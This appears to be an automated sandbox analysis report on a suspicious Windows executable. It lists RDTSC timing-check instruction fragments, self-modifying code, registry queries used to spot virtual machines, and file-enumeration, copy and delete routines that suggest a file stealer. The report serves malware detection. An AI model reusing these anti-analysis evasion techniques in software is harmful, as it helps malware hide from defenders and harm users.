              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CD60 second address: C6CD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7048F second address: C704A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F893453D386h 0x0000000a popad 0x0000000b jl 00007F893453D392h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704A2 second address: C704A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704A8 second address: C704AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C705E3 second address: C705FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C705FC second address: C70635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D391h 0x00000009 jns 00007F893453D386h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F893453D399h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70635 second address: C70639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70639 second address: C7063D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7063D second address: C70654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F8934532D06h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9186D second address: B9189A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F893453D38Fh 0x0000000b pushad 0x0000000c jmp 00007F893453D391h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9189A second address: B918B5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F8934532D0Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jo 00007F8934532D06h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79F36 second address: C79F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79F3A second address: C79F44 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79F44 second address: C79F49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F739 second address: C7F75A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8934532D06h 0x00000009 jmp 00007F8934532D16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DE16 second address: C7DE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D092 second address: C8D096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5346 second address: CA537E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F893453D3A1h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5A4D second address: CA5A53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5A53 second address: CA5A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D398h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F32 second address: CA5F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8934532D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F3C second address: CA5F46 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F893453D386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F46 second address: CA5F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F4C second address: CA5F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F893453D390h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F66 second address: CA5F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F6C second address: CA5F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA60A8 second address: CA60AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA60AE second address: CA60B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79A4 second address: CA79AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79AD second address: CA79B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79B3 second address: CA79BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79BD second address: CA79DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D398h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3A1 second address: CAA3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3A7 second address: CAA3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3AB second address: CAA3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA704 second address: CAA719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F893453D38Dh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA914 second address: CAA94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8934532D15h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F8934532D18h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA94E second address: CAA955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0DC second address: CAC0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8934532D13h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0F3 second address: CAC0F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0F9 second address: CAC0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0FF second address: CAC10C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F893453D388h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533022F second address: 5330233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330233 second address: 5330298 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F893453D38Bh 0x00000008 sub ax, B46Eh 0x0000000d jmp 00007F893453D399h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F893453D390h 0x0000001b and si, DFE8h 0x00000020 jmp 00007F893453D38Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007F893453D38Bh 0x00000030 pop esi 0x00000031 mov eax, ebx 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330298 second address: 5330323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8934532D10h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F8934532D0Bh 0x0000000f add cx, 2C8Eh 0x00000014 jmp 00007F8934532D19h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F8934532D0Ah 0x00000027 sub cx, A708h 0x0000002c jmp 00007F8934532D0Bh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F8934532D18h 0x00000038 and cl, 00000068h 0x0000003b jmp 00007F8934532D0Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330323 second address: 5330329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330329 second address: 533032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533032D second address: 5330351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F893453D38Bh 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330351 second address: 5330360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8934532D0Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330360 second address: 5330364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330364 second address: 5330375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edx, si 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330375 second address: 53303B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F893453D393h 0x00000014 or ax, 801Eh 0x00000019 jmp 00007F893453D399h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303B7 second address: 53303BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533040B second address: 5330463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F893453D393h 0x00000013 adc eax, 46F8359Eh 0x00000019 jmp 00007F893453D399h 0x0000001e popfd 0x0000001f push eax 0x00000020 pop edi 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330463 second address: 5330469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1FA67 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1FB36 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1D3E2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BD1DCE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1FA25 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-26816
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26889
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_007E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_007EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007D16B9
